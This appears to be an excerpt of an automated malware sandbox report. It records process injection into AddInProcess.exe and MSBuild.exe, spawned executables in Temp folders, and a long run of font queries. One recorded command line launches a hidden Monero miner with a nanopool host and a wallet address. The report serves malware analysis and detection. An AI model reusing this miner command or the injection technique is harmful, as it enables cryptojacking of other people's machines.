                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: A95F7D8010Jump to behavior
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 454000
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47A000
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D09008
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeProcess created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: C:\Users\user\AppData\Local\Temp\gtxkvh.exe "C:\Users\user\AppData\Local\Temp\gtxkvh.exe"Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50Jump to behavior
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeProcess created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AE9000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BEC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E0346C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.00000000030B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.00000000030B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F0AD3 cpuid 0_2_005F0AD3
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00607854
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: GetLocaleInfoW,0_2_00607AA7
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00607BCD
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: GetLocaleInfoW,0_2_005FD43D
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: GetLocaleInfoW,0_2_00607CD3
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00607DA2
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: EnumSystemLocalesW,0_2_006076E3
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: EnumSystemLocalesW,0_2_005FCEDB
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: EnumSystemLocalesW,0_2_0060772E
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: EnumSystemLocalesW,0_2_006077C9
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00567854
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: GetLocaleInfoW,3_2_00567AA7
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00567BCD
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: GetLocaleInfoW,3_2_0055D43D
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: GetLocaleInfoW,3_2_00567CD3
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00567DA2
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: EnumSystemLocalesW,3_2_0055CEDB
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: EnumSystemLocalesW,3_2_005676E3
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: EnumSystemLocalesW,3_2_0056772E
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: EnumSystemLocalesW,3_2_005677C9
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeQueries volume information: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
